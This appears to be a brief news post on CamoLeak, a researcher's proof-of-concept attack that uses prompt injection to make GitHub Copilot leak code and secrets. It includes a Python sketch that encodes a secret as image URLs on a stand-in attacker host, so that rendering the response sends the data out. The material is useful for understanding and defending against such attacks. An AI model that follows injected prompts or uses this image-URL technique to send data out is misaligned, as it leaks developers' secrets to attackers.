While GitHub has advanced protections for its built-in AI agent, a researcher devised a creative proof-of-concept (PoC) attack, dubbed CamoLeak, that exfiltrates code and secrets via Copilot.
First seen on darkreading.com
Jump to article: www.darkreading.com/application-security/github-copilot-camoleak-ai-attack-exfils-data
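
The core trick reported in the CamoLeak research is to smuggle data out through the image fetches a victim's client performs when rendering an AI response: an injected prompt instructs Copilot to encode a secret as a sequence of image URLs, and the attacker reconstructs the secret from the resulting requests. The Python sketch below illustrates only that general exfiltration primitive; the domain, function name, and per-character encoding are hypothetical stand-ins, and the real PoC reportedly routed fetches through GitHub's Camo image proxy using pre-generated signed URLs, which this sketch does not reproduce.

```python
# Illustrative sketch only: shows the general idea of leaking a secret
# through image URLs. All names and URLs here are hypothetical and are
# not the researcher's actual code.

SECRET = "ghp_example_token"  # stand-in for a leaked secret


def encode_as_image_markdown(secret: str,
                             base: str = "https://attacker.example/px") -> str:
    """Map each character of `secret` to a per-character image URL.

    When a chat client renders the resulting markdown, it fetches the
    images in order, and the attacker's server can reconstruct the
    secret from its access log. The reported attack instead used
    pre-signed URLs on GitHub's Camo image proxy.
    """
    lines = []
    for i, ch in enumerate(secret):
        # One image per character; position and code point leak via the URL.
        lines.append(f"![]({base}/{i}/{ord(ch)}.png)")
    return "\n".join(lines)


if __name__ == "__main__":
    print(encode_as_image_markdown(SECRET))
```

With this encoding, the attacker's web server needs no special logic: the ordered sequence of requests for `/0/103.png`, `/1/104.png`, and so on in its access log spells out the secret one code point at a time.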

